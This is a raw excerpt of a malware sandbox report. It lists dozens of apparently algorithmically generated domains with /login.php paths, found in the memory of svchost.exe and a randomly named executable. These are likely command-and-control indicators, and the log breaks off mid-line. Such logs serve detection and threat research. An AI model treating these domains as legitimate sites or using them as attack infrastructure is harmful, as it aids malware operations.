Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymej.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvynid.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysur.com/login.php
Source: svchost.exe, 00000002.00000003.2587482853.00000000033CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytan.com/login.phpq.com/
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388842672.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2207439218.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427598946.0000000003379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485092483.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2649196751.00000000091F7000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lyvytuj.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywar.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2849287050.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxin.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxyj.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfar.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665309927.000000000332D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608108.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2702056951.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663825681.000000000332D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2700192548.0000000003323000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfuj.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygax.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjod.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.0000000001555000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lyxylux.com/login.php
Source: svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365866545.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375028226.00000000033EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxylyj.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymix.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymix.com/login.phpE
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynej.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2653309169.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360864557.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2849292157.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2725544478.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyvyn.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375772840.0000000003361000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365635316.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2849287050.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381004146.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376920856.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywen.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000156A000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/login.php
Source: svchost.exe, 00000002.00000003.2612263098.00000000040F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/P
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341444075.00000000093C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygav.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237916986.000000000337D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001018000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 